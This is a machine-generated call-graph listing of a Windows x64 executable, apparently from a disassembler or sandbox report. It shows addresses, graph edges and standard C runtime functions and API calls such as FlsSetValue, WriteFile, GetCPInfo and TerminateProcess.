7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6423->6424 6425 7ff7aa95ae89 6424->6425 6426 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6425->6426 6427 7ff7aa95ae97 6426->6427 6428 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6427->6428 6429 7ff7aa95aea5 6428->6429 6430 7ff7aa95adb8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6429->6430 6431 7ff7aa95aeb4 6430->6431 6432 7ff7aa958b3c __free_lconv_mon 7 API calls 6431->6432 6433 7ff7aa95aec0 6432->6433 6434 7ff7aa958b3c __free_lconv_mon 7 API calls 6433->6434 6435 7ff7aa95aecc 6434->6435 6436 7ff7aa958b3c __free_lconv_mon 7 API calls 6435->6436 6437 7ff7aa95aed8 6436->6437 6438 7ff7aa958b3c __free_lconv_mon 7 API calls 6437->6438 6438->6404 6440 7ff7aa95adce 6439->6440 6441 7ff7aa95addf 6439->6441 6440->6441 6442 7ff7aa958b3c __free_lconv_mon 7 API calls 6440->6442 6441->6408 6442->6440 6444 7ff7aa95bbb0 6443->6444 6448 7ff7aa95bbd7 6443->6448 6445 7ff7aa958878 _set_fmode 7 API calls 6444->6445 6446 7ff7aa95bbc4 6444->6446 6444->6448 6445->6446 6447 7ff7aa95bc59 6446->6447 6446->6448 6454 7ff7aa95bc14 6446->6454 6449 7ff7aa958284 _set_fmode 7 API calls 6447->6449 6451 7ff7aa95bde0 _CreateFrameInfo 6448->6451 6457 7ff7aa95bd13 6448->6457 6472 7ff7aa958700 6448->6472 6450 7ff7aa95bc5e 6449->6450 6452 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6450->6452 6452->6454 6454->6289 6456 7ff7aa958700 _CreateFrameInfo 34 API calls 6456->6457 6458 7ff7aa958700 34 API calls _CreateFrameInfo 6457->6458 6458->6457 6460 7ff7aa95699e _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 6459->6460 6461 7ff7aa9569c6 RtlCaptureContext RtlLookupFunctionEntry 6460->6461 6462 7ff7aa956a36 IsDebuggerPresent 6461->6462 6463 7ff7aa956a00 RtlVirtualUnwind 6461->6463 6495 7ff7aa961068 6462->6495 6463->6462 6497 7ff7aa956ac8 6469->6497 6473 7ff7aa958715 __vcrt_InitializeCriticalSectionEx 6472->6473 6474 7ff7aa958724 FlsGetValue 6473->6474 6475 7ff7aa958741 FlsSetValue 6473->6475 6476 7ff7aa95873b 6474->6476 6492 7ff7aa958731 6474->6492 6477 7ff7aa958753 6475->6477 6475->6492 6476->6475 6479 7ff7aa958ac4 _set_fmode 7 API calls 6477->6479 6478 7ff7aa9587ad SetLastError 6480 7ff7aa9587cd 6478->6480 6481 7ff7aa9587ba 6478->6481 6482 7ff7aa958762 6479->6482 6483 7ff7aa957df4 _CreateFrameInfo 28 API calls 6480->6483 6481->6456 6484 7ff7aa958780 FlsSetValue 6482->6484 6485 7ff7aa958770 FlsSetValue 6482->6485 6488 7ff7aa9587d2 6483->6488 6486 7ff7aa95878c FlsSetValue 6484->6486 6487 7ff7aa95879e 6484->6487 6489 7ff7aa958779 6485->6489 6486->6489 6491 7ff7aa9584a4 _set_fmode 7 API calls 6487->6491 6490 7ff7aa958b3c __free_lconv_mon 7 API calls 6489->6490 6490->6492 6493 7ff7aa9587a6 6491->6493 6492->6478 6494 7ff7aa958b3c __free_lconv_mon 7 API calls 6493->6494 6494->6478 6496 7ff7aa96106f 6495->6496 6498 7ff7aa956af3 6497->6498 6505 7ff7aa956b64 6498->6505 6500 7ff7aa956b1a 6501 7ff7aa956b3d 6500->6501 6515 7ff7aa956710 6500->6515 6503 7ff7aa956b52 6501->6503 6504 7ff7aa956710 _invalid_parameter_noinfo_noreturn 34 API calls 6501->6504 6503->6300 6504->6503 6523 7ff7aa9568ac 6505->6523 6510 7ff7aa956b9f 6510->6500 6516 7ff7aa956768 6515->6516 6517 7ff7aa95671f __vcrt_InitializeCriticalSectionEx 6515->6517 6516->6501 6518 7ff7aa958940 _invalid_parameter_noinfo_noreturn 12 API calls 6517->6518 6519 7ff7aa95674e SetLastError 6518->6519 6519->6516 6520 7ff7aa956771 6519->6520 6521 7ff7aa957df4 _CreateFrameInfo 33 API calls 6520->6521 6522 7ff7aa956776 6521->6522 6524 7ff7aa956903 6523->6524 6525 7ff7aa9568c8 __vcrt_InitializeCriticalSectionEx 6523->6525 6524->6510 6528 7ff7aa956918 6524->6528 6536 7ff7aa958940 6525->6536 6529 7ff7aa95694c 6528->6529 6530 7ff7aa956934 __vcrt_InitializeCriticalSectionEx 6528->6530 6529->6510 6532 7ff7aa956c80 IsProcessorFeaturePresent 6529->6532 6531 7ff7aa95693a SetLastError 6530->6531 6531->6529 6533 7ff7aa956c93 6532->6533 6534 7ff7aa956964 _invalid_parameter_noinfo_noreturn 9 API calls 6533->6534 6535 7ff7aa956cae GetCurrentProcess TerminateProcess 6534->6535 6537 7ff7aa95897a FlsSetValue 6536->6537 6538 7ff7aa95895f FlsGetValue 6536->6538 6539 7ff7aa9568f3 SetLastError 6537->6539 6541 7ff7aa958987 6537->6541 6538->6539 6540 7ff7aa958974 6538->6540 6539->6524 6540->6537 6542 7ff7aa958ac4 _set_fmode 7 API calls 6541->6542 6543 7ff7aa958996 6542->6543 6544 7ff7aa9589b4 FlsSetValue 6543->6544 6545 7ff7aa9589a4 FlsSetValue 6543->6545 6547 7ff7aa9589c0 FlsSetValue 6544->6547 6548 7ff7aa9589d2 6544->6548 6546 7ff7aa9589ad 6545->6546 6550 7ff7aa958b3c __free_lconv_mon 7 API calls 6546->6550 6547->6546 6549 7ff7aa9584a4 _set_fmode 7 API calls 6548->6549 6551 7ff7aa9589da 6549->6551 6550->6539 6552 7ff7aa958b3c __free_lconv_mon 7 API calls 6551->6552 6552->6539 6557 7ff7aa959f5f 6553->6557 6554 7ff7aa959f69 6555 7ff7aa959fdb 6554->6555 6556 7ff7aa957df4 _CreateFrameInfo 34 API calls 6554->6556 6555->6252 6559 7ff7aa959ff3 6556->6559 6557->6554 6558 7ff7aa958b3c __free_lconv_mon 7 API calls 6557->6558 6558->6554 6560 7ff7aa95a052 6559->6560 6561 7ff7aa9587d4 39 API calls 6559->6561 6560->6252 6562 7ff7aa95a03c 6561->6562 6563 7ff7aa959ccc 51 API calls 6562->6563 6563->6560 6600 7ff7aa958114 6564->6600 6567 7ff7aa9599ec GetOEMCP 6569 7ff7aa959a13 6567->6569 6568 7ff7aa9599fe 6568->6569 6570 7ff7aa959a03 GetACP 6568->6570 6569->6255 6571 7ff7aa958a64 6569->6571 6570->6569 6572 7ff7aa958aaf 6571->6572 6576 7ff7aa958a73 _set_fmode 6571->6576 6573 7ff7aa958284 _set_fmode 7 API calls 6572->6573 6575 7ff7aa958aad 6573->6575 6574 7ff7aa958a96 RtlAllocateHeap 6574->6575 6574->6576 6575->6258 6575->6260 6576->6572 6576->6574 6578 7ff7aa9599cc 36 API calls 6577->6578 6579 7ff7aa95a0a9 6578->6579 6580 7ff7aa95a1ff 6579->6580 6582 7ff7aa95a0e6 IsValidCodePage 6579->6582 6586 7ff7aa95a100 __scrt_get_show_window_mode 6579->6586 6642 7ff7aa952650 6580->6642 6582->6580 6584 7ff7aa95a0f7 6582->6584 6583 7ff7aa959e39 6583->6263 6583->6267 6585 7ff7aa95a126 GetCPInfo 6584->6585 6584->6586 6585->6580 6585->6586 6631 7ff7aa959ae4 6586->6631 6590 7ff7aa959818 __scrt_get_show_window_mode 6588->6590 6589 7ff7aa958284 _set_fmode 7 API calls 6591 7ff7aa9598b4 6589->6591 6590->6589 6593 7ff7aa959845 __scrt_get_show_window_mode 6590->6593 6592 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6591->6592 6592->6593 6594 7ff7aa958284 _set_fmode 7 API calls 6593->6594 6597 7ff7aa9598f7 6593->6597 6595 7ff7aa959955 6594->6595 6596 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6595->6596 6596->6597 6598 7ff7aa958b3c __free_lconv_mon 7 API calls 6597->6598 6599 7ff7aa959991 6597->6599 6598->6599 6599->6268 6601 7ff7aa958138 6600->6601 6602 7ff7aa958133 6600->6602 6601->6602 6603 7ff7aa958700 _CreateFrameInfo 34 API calls 6601->6603 6602->6567 6602->6568 6604 7ff7aa958153 6603->6604 6608 7ff7aa9582a4 6604->6608 6609 7ff7aa9582b9 6608->6609 6610 7ff7aa958176 6608->6610 6609->6610 6616 7ff7aa95b3b8 6609->6616 6612 7ff7aa958310 6610->6612 6613 7ff7aa958338 6612->6613 6614 7ff7aa958325 6612->6614 6613->6602 6614->6613 6628 7ff7aa95a060 6614->6628 6617 7ff7aa958700 _CreateFrameInfo 34 API calls 6616->6617 6619 7ff7aa95b3c7 6617->6619 6618 7ff7aa95b412 6618->6610 6619->6618 6624 7ff7aa95b428 6619->6624 6621 7ff7aa95b400 6621->6618 6622 7ff7aa957df4 _CreateFrameInfo 34 API calls 6621->6622 6623 7ff7aa95b425 6622->6623 6625 7ff7aa95b43a Concurrency::details::SchedulerProxy::DeleteThis 6624->6625 6627 7ff7aa95b447 6624->6627 6626 7ff7aa95b110 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 6625->6626 6625->6627 6626->6627 6627->6621 6629 7ff7aa958700 _CreateFrameInfo 34 API calls 6628->6629 6630 7ff7aa95a069 6629->6630 6632 7ff7aa959b21 GetCPInfo 6631->6632 6633 7ff7aa959c17 6631->6633 6632->6633 6639 7ff7aa959b34 6632->6639 6634 7ff7aa952650 _log10_special 4 API calls 6633->6634 6636 7ff7aa959cb6 6634->6636 6636->6580 6649 7ff7aa95aef4 6639->6649 6643 7ff7aa952659 6642->6643 6644 7ff7aa952664 6643->6644 6645 7ff7aa9529a0 IsProcessorFeaturePresent 6643->6645 6644->6583 6646 7ff7aa9529b8 6645->6646 6721 7ff7aa952b98 RtlCaptureContext 6646->6721 6648 7ff7aa9529cb 6648->6583 6650 7ff7aa958114 34 API calls 6649->6650 6651 7ff7aa95af36 6650->6651 6669 7ff7aa95a3f8 6651->6669 6670 7ff7aa95a401 MultiByteToWideChar 6669->6670 6722 7ff7aa952bb2 RtlLookupFunctionEntry 6721->6722 6723 7ff7aa952bc8 RtlVirtualUnwind 6722->6723 6724 7ff7aa952c01 6722->6724 6723->6722 6723->6724 6724->6648 6729 7ff7aa952420 6725->6729 6726 7ff7aa952528 6770 7ff7aa9511a0 6726->6770 6729->6726 6730 7ff7aa952522 6729->6730 6731 7ff7aa952448 6729->6731 6732 7ff7aa95248c 6729->6732 6733 7ff7aa9524e0 6729->6733 6764 7ff7aa951100 6730->6764 6731->6161 6732->6730 6757 7ff7aa952670 6732->6757 6735 7ff7aa952670 36 API calls 6733->6735 6735->6731 6738 7ff7aa956c50 _invalid_parameter_noinfo_noreturn 34 API calls 6738->6730 6740 7ff7aa956828 6739->6740 6803 7ff7aa955f74 6740->6803 6743 7ff7aa95687d 6745 7ff7aa9514ed 6743->6745 6746 7ff7aa956710 _invalid_parameter_noinfo_noreturn 34 API calls 6743->6746 6744 7ff7aa956710 _invalid_parameter_noinfo_noreturn 34 API calls 6744->6743 6745->6175 6746->6745 6748 7ff7aa951278 6747->6748 6749 7ff7aa951252 WaitForSingleObject CloseHandle CloseHandle 6747->6749 6750 7ff7aa952650 _log10_special 4 API calls 6748->6750 6749->6748 6751 7ff7aa951288 6750->6751 6751->6182 6753 7ff7aa956ac8 _invalid_parameter_noinfo_noreturn 34 API calls 6752->6753 6754 7ff7aa956c69 6753->6754 6755 7ff7aa956c80 _invalid_parameter_noinfo_noreturn 12 API calls 6754->6755 6756 7ff7aa956c7e 6755->6756 6758 7ff7aa95267b _set_fmode 6757->6758 6759 7ff7aa9524a1 6758->6759 6762 7ff7aa9526a5 6758->6762 6773 7ff7aa952c0c 6758->6773 6759->6731 6759->6738 6761 7ff7aa951100 Concurrency::cancel_current_task 36 API calls 6763 7ff7aa9526ab 6761->6763 6762->6761 6765 7ff7aa95110e Concurrency::cancel_current_task 6764->6765 6766 7ff7aa953d54 std::_Xinvalid_argument 2 API calls 6765->6766 6767 7ff7aa95111f 6766->6767 6782 7ff7aa953b30 6767->6782 6769 7ff7aa951149 6769->6726 6795 7ff7aa952610 6770->6795 6774 7ff7aa952c1a std::bad_alloc::bad_alloc 6773->6774 6777 7ff7aa953d54 6774->6777 6776 7ff7aa952c2b 6778 7ff7aa953d73 6777->6778 6779 7ff7aa953d9c RtlPcToFileHeader 6778->6779 6780 7ff7aa953dbe RaiseException 6778->6780 6781 7ff7aa953db4 6779->6781 6780->6776 6781->6780 6783 7ff7aa953b86 __std_exception_destroy 6782->6783 6784 7ff7aa953b51 6782->6784 6783->6769 6784->6783 6786 7ff7aa957e4c 6784->6786 6787 7ff7aa957e59 6786->6787 6788 7ff7aa957e63 6786->6788 6787->6788 6793 7ff7aa957e7e 6787->6793 6789 7ff7aa958284 _set_fmode 7 API calls 6788->6789 6790 7ff7aa957e6a 6789->6790 6791 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6790->6791 6792 7ff7aa957e76 6791->6792 6792->6783 6793->6792 6794 7ff7aa958284 _set_fmode 7 API calls 6793->6794 6794->6790 6800 7ff7aa95258c 6795->6800 6798 7ff7aa953d54 std::_Xinvalid_argument 2 API calls 6799 7ff7aa952632 6798->6799 6801 7ff7aa953b30 __std_exception_copy 34 API calls 6800->6801 6802 7ff7aa9525c0 6801->6802 6802->6798 6804 7ff7aa955fac 6803->6804 6805 7ff7aa955fbe 6803->6805 6806 7ff7aa958284 _set_fmode 7 API calls 6804->6806 6807 7ff7aa956008 6805->6807 6809 7ff7aa955fcc 6805->6809 6808 7ff7aa955fb1 6806->6808 6813 7ff7aa956023 6807->6813 6822 7ff7aa956780 6807->6822 6810 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6808->6810 6811 7ff7aa956b64 _invalid_parameter_noinfo_noreturn 34 API calls 6809->6811 6820 7ff7aa955fbc 6810->6820 6811->6820 6814 7ff7aa9563a9 6813->6814 6815 7ff7aa958284 _set_fmode 7 API calls 6813->6815 6816 7ff7aa958284 _set_fmode 7 API calls 6814->6816 6814->6820 6817 7ff7aa95639e 6815->6817 6819 7ff7aa95663a 6816->6819 6818 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6817->6818 6818->6814 6821 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6819->6821 6820->6743 6820->6744 6821->6820 6823 7ff7aa956710 _invalid_parameter_noinfo_noreturn 34 API calls 6822->6823 6824 7ff7aa956797 6823->6824 6829 7ff7aa9582d8 6824->6829 6830 7ff7aa9567bf 6829->6830 6831 7ff7aa9582f1 6829->6831 6833 7ff7aa958344 6830->6833 6831->6830 6832 7ff7aa95b3b8 34 API calls 6831->6832 6832->6830 6834 7ff7aa95835d 6833->6834 6835 7ff7aa9567cf 6833->6835 6834->6835 6836 7ff7aa95a060 34 API calls 6834->6836 6835->6813 6836->6835 6838 7ff7aa958700 _CreateFrameInfo 34 API calls 6837->6838 6839 7ff7aa957dd1 6838->6839 6840 7ff7aa957df4 _CreateFrameInfo 34 API calls 6839->6840 6841 7ff7aa957df1 6840->6841 6842 7ff7aa955d5d 6843 7ff7aa957dc8 34 API calls 6842->6843 6844 7ff7aa955d62 6843->6844 6845 7ff7aa955d89 GetModuleHandleW 6844->6845 6846 7ff7aa955dd3 6844->6846 6845->6846 6850 7ff7aa955d96 6845->6850 6854 7ff7aa955c60 6846->6854 6848 7ff7aa955e16 6849 7ff7aa955e0f 6849->6848 6858 7ff7aa955e2c 6849->6858 6850->6846 6864 7ff7aa955e84 GetModuleHandleExW 6850->6864 6855 7ff7aa955c7c 6854->6855 6866 7ff7aa955c98 6855->6866 6857 7ff7aa955c85 6857->6849 6859 7ff7aa955e39 6858->6859 6860 7ff7aa955e3d GetCurrentProcess TerminateProcess 6859->6860 6861 7ff7aa955e4e 6859->6861 6860->6861 6862 7ff7aa955e84 GetModuleHandleExW 6861->6862 6863 7ff7aa955e55 ExitProcess 6862->6863 6865 7ff7aa955eb8 __vcrt_InitializeCriticalSectionEx 6864->6865 6865->6846 6867 7ff7aa955cae 6866->6867 6869 7ff7aa955d11 6866->6869 6867->6869 6870 7ff7aa957b74 6867->6870 6869->6857 6873 7ff7aa957858 6870->6873 6872 7ff7aa957bb1 6872->6869 6874 7ff7aa957874 6873->6874 6877 7ff7aa957a44 6874->6877 6876 7ff7aa95787d 6876->6872 6878 7ff7aa957a72 6877->6878 6879 7ff7aa957a6a 6877->6879 6878->6879 6880 7ff7aa958b3c __free_lconv_mon 7 API calls 6878->6880 6879->6876 6880->6879 7346 7ff7aa960959 7347 7ff7aa9539fc __CxxCallCatchBlock 38 API calls 7346->7347 7348 7ff7aa96096c 7347->7348 7353 7ff7aa953c64 __CxxCallCatchBlock 38 API calls 7348->7353 7354 7ff7aa9609ab __CxxCallCatchBlock 7348->7354 7349 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7350 7ff7aa9609bf 7349->7350 7351 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7350->7351 7352 7ff7aa9609cf 7351->7352 7353->7354 7354->7349 7079 7ff7aa95b9e0 GetProcessHeap 7924 7ff7aa95d260 7925 7ff7aa95a000 51 API calls 7924->7925 7926 7ff7aa95d269 7925->7926 7080 7ff7aa9609df 7083 7ff7aa953cb8 7080->7083 7084 7ff7aa953cd0 7083->7084 7085 7ff7aa953ce2 7083->7085 7084->7085 7086 7ff7aa953cd8 7084->7086 7087 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7085->7087 7089 7ff7aa953ce0 7086->7089 7090 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7086->7090 7088 7ff7aa953ce7 7087->7088 7088->7089 7091 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7088->7091 7092 7ff7aa953d07 7090->7092 7091->7089 7093 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7092->7093 7094 7ff7aa953d14 7093->7094 7095 7ff7aa957dc8 34 API calls 7094->7095 7096 7ff7aa953d1d 7095->7096 7748 7ff7aa957ce0 7749 7ff7aa957cf9 7748->7749 7751 7ff7aa957d11 7748->7751 7750 7ff7aa958b3c __free_lconv_mon 7 API calls 7749->7750 7749->7751 7750->7751 7927 7ff7aa95a85f 7928 7ff7aa95a884 7927->7928 7929 7ff7aa95a8f6 7927->7929 7928->7929 7934 7ff7aa95a8b7 7928->7934 7930 7ff7aa958284 _set_fmode 7 API calls 7929->7930 7931 7ff7aa95a8fb 7930->7931 7936 7ff7aa958264 7931->7936 7933 7ff7aa95a8e8 7934->7933 7935 7ff7aa95a8e0 SetStdHandle 7934->7935 7935->7933 7937 7ff7aa958878 _set_fmode 7 API calls 7936->7937 7938 7ff7aa95826d 7937->7938 7938->7933 7097 7ff7aa9607f6 7098 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7097->7098 7099 7ff7aa96080e 7098->7099 7100 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7099->7100 7101 7ff7aa960829 7100->7101 7102 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7101->7102 7103 7ff7aa96083d 7102->7103 7104 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7103->7104 7105 7ff7aa96087f 7104->7105 7106 7ff7aa9609f5 7107 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7106->7107 7108 7ff7aa960a03 7107->7108 7109 7ff7aa960a0e 7108->7109 7110 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7108->7110 7110->7109 7939 7ff7aa95c270 7940 7ff7aa95c27b 7939->7940 7948 7ff7aa95e170 7940->7948 7942 7ff7aa95c280 7954 7ff7aa95e224 7942->7954 7945 7ff7aa95c2b1 7946 7ff7aa958b3c __free_lconv_mon 7 API calls 7945->7946 7947 7ff7aa95c2bd 7946->7947 7953 7ff7aa95e189 7948->7953 7949 7ff7aa95e209 7949->7942 7950 7ff7aa95e1d4 RtlDeleteCriticalSection 7952 7ff7aa958b3c __free_lconv_mon 7 API calls 7950->7952 7952->7953 7953->7949 7953->7950 7958 7ff7aa95e6dc 7953->7958 7955 7ff7aa95e238 7954->7955 7956 7ff7aa95c292 RtlDeleteCriticalSection 7954->7956 7955->7956 7957 7ff7aa958b3c __free_lconv_mon 7 API calls 7955->7957 7956->7942 7956->7945 7957->7956 7959 7ff7aa95e70c 7958->7959 7966 7ff7aa95e5b8 7959->7966 7961 7ff7aa95e725 7962 7ff7aa95e74a 7961->7962 7964 7ff7aa956710 _invalid_parameter_noinfo_noreturn 34 API calls 7961->7964 7963 7ff7aa95e75f 7962->7963 7965 7ff7aa956710 _invalid_parameter_noinfo_noreturn 34 API calls 7962->7965 7963->7953 7964->7962 7965->7963 7967 7ff7aa95e5d3 7966->7967 7969 7ff7aa95e601 7966->7969 7968 7ff7aa956b64 _invalid_parameter_noinfo_noreturn 34 API calls 7967->7968 7971 7ff7aa95e5f3 7968->7971 7969->7971 7972 7ff7aa95e634 7969->7972 7971->7961 7973 7ff7aa95e674 7972->7973 7974 7ff7aa95e64f 7972->7974 7984 7ff7aa95e66f 7973->7984 7986 7ff7aa95bfdc 7973->7986 7975 7ff7aa956b64 _invalid_parameter_noinfo_noreturn 34 API calls 7974->7975 7975->7984 7978 7ff7aa95e224 7 API calls 7979 7ff7aa95e691 7978->7979 7992 7ff7aa95c45c 7979->7992 7984->7971 7985 7ff7aa958b3c __free_lconv_mon 7 API calls 7985->7984 7987 7ff7aa95c002 7986->7987 7991 7ff7aa95c033 7986->7991 7988 7ff7aa95c45c 34 API calls 7987->7988 7987->7991 7989 7ff7aa95c023 7988->7989 8005 7ff7aa95dd48 7989->8005 7991->7978 7993 7ff7aa95c475 7992->7993 7994 7ff7aa95c465 7992->7994 7998 7ff7aa95f0d4 7993->7998 7995 7ff7aa958284 _set_fmode 7 API calls 7994->7995 7996 7ff7aa95c46a 7995->7996 7997 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7996->7997 7997->7993 7999 7ff7aa95f100 7998->7999 8004 7ff7aa95e6a3 7998->8004 8000 7ff7aa95f164 7999->8000 8002 7ff7aa95f130 7999->8002 8001 7ff7aa956b64 _invalid_parameter_noinfo_noreturn 34 API calls 8000->8001 8001->8004 8097 7ff7aa95f05c 8002->8097 8004->7984 8004->7985 8006 7ff7aa95dd71 8005->8006 8008 7ff7aa95dd9e 8005->8008 8006->7991 8007 7ff7aa95ddb7 8009 7ff7aa956b64 _invalid_parameter_noinfo_noreturn 34 API calls 8007->8009 8008->8007 8010 7ff7aa95de0e 8008->8010 8009->8006 8010->8006 8012 7ff7aa95de68 8010->8012 8013 7ff7aa95de93 8012->8013 8038 7ff7aa95dec7 __vcrt_InitializeCriticalSectionEx 8012->8038 8014 7ff7aa95de98 8013->8014 8016 7ff7aa95df06 8013->8016 8015 7ff7aa956b64 _invalid_parameter_noinfo_noreturn 34 API calls 8014->8015 8015->8038 8017 7ff7aa95df1c 8016->8017 8040 7ff7aa95e574 8016->8040 8046 7ff7aa95e268 8017->8046 8020 7ff7aa95e0a8 WriteFile 8020->8038 8021 7ff7aa95e056 8022 7ff7aa95e05e 8021->8022 8023 7ff7aa95e094 8021->8023 8027 7ff7aa95e080 8022->8027 8032 7ff7aa95e063 8022->8032 8079 7ff7aa95d9b8 8023->8079 8025 7ff7aa95df77 GetConsoleMode 8030 7ff7aa95e044 8025->8030 8031 7ff7aa95df92 8025->8031 8072 7ff7aa95dbd8 8027->8072 8028 7ff7aa956780 34 API calls 8033 7ff7aa95df54 8028->8033 8030->8020 8030->8021 8034 7ff7aa95e021 8031->8034 8039 7ff7aa95df9e 8031->8039 8032->8038 8066 7ff7aa95dabc 8032->8066 8033->8025 8033->8030 8054 7ff7aa95d540 GetConsoleOutputCP 8034->8054 8037 7ff7aa95e57c CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 8037->8039 8038->8006 8039->8037 8039->8038 8041 7ff7aa95e4c8 8040->8041 8085 7ff7aa95a924 8041->8085 8044 7ff7aa95e506 SetFilePointerEx 8045 7ff7aa95e4f5 __vcrt_InitializeCriticalSectionEx 8044->8045 8045->8017 8047 7ff7aa95e271 8046->8047 8049 7ff7aa95e27e 8046->8049 8048 7ff7aa958284 _set_fmode 7 API calls 8047->8048 8050 7ff7aa95df28 8048->8050 8049->8050 8051 7ff7aa958284 _set_fmode 7 API calls 8049->8051 8050->8028 8050->8030 8050->8033 8052 7ff7aa95e2b5 8051->8052 8053 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 8052->8053 8053->8050 8055 7ff7aa95d5d4 8054->8055 8063 7ff7aa95d5dc 8054->8063 8056 7ff7aa956780 34 API calls 8055->8056 8056->8063 8057 7ff7aa952650 _log10_special 4 API calls 8058 7ff7aa95d99a 8057->8058 8058->8038 8059 7ff7aa95c2e4 35 API calls 8059->8063 8060 7ff7aa95d908 __vcrt_InitializeCriticalSectionEx 8060->8057 8061 7ff7aa95a488 WideCharToMultiByte 8061->8063 8062 7ff7aa95d870 WriteFile 8062->8060 8062->8063 8063->8059 8063->8060 8063->8061 8063->8062 8063->8063 8064 7ff7aa95e30c IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 8063->8064 8065 7ff7aa95d8b0 WriteFile 8063->8065 8064->8063 8065->8060 8065->8063 8068 7ff7aa95dad4 8066->8068 8067 7ff7aa952650 _log10_special 4 API calls 8069 7ff7aa95dbbd 8067->8069 8070 7ff7aa95db63 WriteFile 8068->8070 8071 7ff7aa95dba0 __vcrt_InitializeCriticalSectionEx 8068->8071 8069->8038 8070->8068 8070->8071 8071->8067 8073 7ff7aa95dbf4 8072->8073 8074 7ff7aa95dd11 __vcrt_InitializeCriticalSectionEx 8073->8074 8077 7ff7aa95a488 WideCharToMultiByte 8073->8077 8078 7ff7aa95dcce WriteFile 8073->8078 8075 7ff7aa952650 _log10_special 4 API calls 8074->8075 8076 7ff7aa95dd2c 8075->8076 8076->8038 8077->8073 8078->8073 8078->8074 8083 7ff7aa95d9d0 8079->8083 8080 7ff7aa952650 _log10_special 4 API calls 8081 7ff7aa95daa2 8080->8081 8081->8038 8082 7ff7aa95da4e WriteFile 8082->8083 8084 7ff7aa95da85 __vcrt_InitializeCriticalSectionEx 8082->8084 8083->8082 8083->8084 8084->8080 8086 7ff7aa95a92d 8085->8086 8087 7ff7aa95a942 8085->8087 8088 7ff7aa958264 7 API calls 8086->8088 8089 7ff7aa958264 7 API calls 8087->8089 8093 7ff7aa95a93a 8087->8093 8090 7ff7aa95a932 8088->8090 8091 7ff7aa95a97d 8089->8091 8092 7ff7aa958284 _set_fmode 7 API calls 8090->8092 8094 7ff7aa958284 _set_fmode 7 API calls 8091->8094 8092->8093 8093->8044 8093->8045 8095 7ff7aa95a985 8094->8095 8096 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 8095->8096 8096->8093 8098 7ff7aa95f078 8097->8098 8100 7ff7aa95f0ad 8098->8100 8101 7ff7aa95f198 8098->8101 8100->8004 8102 7ff7aa95a924 34 API calls 8101->8102 8105 7ff7aa95f1b4 8102->8105 8103 7ff7aa95f1ba __vcrt_InitializeCriticalSectionEx 8113 7ff7aa95a868 8103->8113 8105->8103 8107 7ff7aa95a924 34 API calls 8105->8107 8112 7ff7aa95f1f7 8105->8112 8106 7ff7aa95a924 34 API calls 8108 7ff7aa95f203 CloseHandle 8106->8108 8109 7ff7aa95f1ea 8107->8109 8108->8103 8111 7ff7aa95a924 34 API calls 8109->8111 8110 7ff7aa95f21f 8110->8100 8111->8112 8112->8103 8112->8106 8114 7ff7aa95a884 8113->8114 8115 7ff7aa95a8f6 8113->8115 8114->8115 8121 7ff7aa95a8b7 8114->8121 8116 7ff7aa958284 _set_fmode 7 API calls 8115->8116 8117 7ff7aa95a8fb 8116->8117 8118 7ff7aa958264 7 API calls 8117->8118 8119 7ff7aa95a8e8 8118->8119 8119->8110 8120 7ff7aa95a8e0 SetStdHandle 8120->8119 8121->8119 8121->8120 7752 7ff7aa9526f0 7753 7ff7aa952700 7752->7753 7767 7ff7aa957668 7753->7767 7755 7ff7aa95270c 7773 7ff7aa952cac 7755->7773 7757 7ff7aa952779 7758 7ff7aa952fb4 6 API calls 7757->7758 7766 7ff7aa952795 7757->7766 7760 7ff7aa9527a5 7758->7760 7759 7ff7aa952724 _RTC_Initialize 7759->7757 7778 7ff7aa952e5c 7759->7778 7762 7ff7aa952739 7781 7ff7aa957198 7762->7781 7764 7ff7aa952745 7764->7757 7812 7ff7aa957760 7764->7812 7768 7ff7aa957679 7767->7768 7769 7ff7aa958284 _set_fmode 7 API calls 7768->7769 7771 7ff7aa957681 7768->7771 7770 7ff7aa957690 7769->7770 7772 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7770->7772 7771->7755 7772->7771 7774 7ff7aa952cbd 7773->7774 7777 7ff7aa952cc2 __scrt_release_startup_lock 7773->7777 7775 7ff7aa952fb4 6 API calls 7774->7775 7774->7777 7776 7ff7aa952d36 7775->7776 7777->7759 7819 7ff7aa952e20 7778->7819 7780 7ff7aa952e65 7780->7762 7782 7ff7aa9571cf 7781->7782 7783 7ff7aa9571b8 7781->7783 7782->7764 7784 7ff7aa9571d6 7783->7784 7785 7ff7aa9571c0 7783->7785 7787 7ff7aa95a000 51 API calls 7784->7787 7786 7ff7aa958284 _set_fmode 7 API calls 7785->7786 7788 7ff7aa9571c5 7786->7788 7789 7ff7aa9571db 7787->7789 7790 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7788->7790 7858 7ff7aa9596d8 GetModuleFileNameW 7789->7858 7790->7782 7795 7ff7aa957138 7 API calls 7796 7ff7aa957245 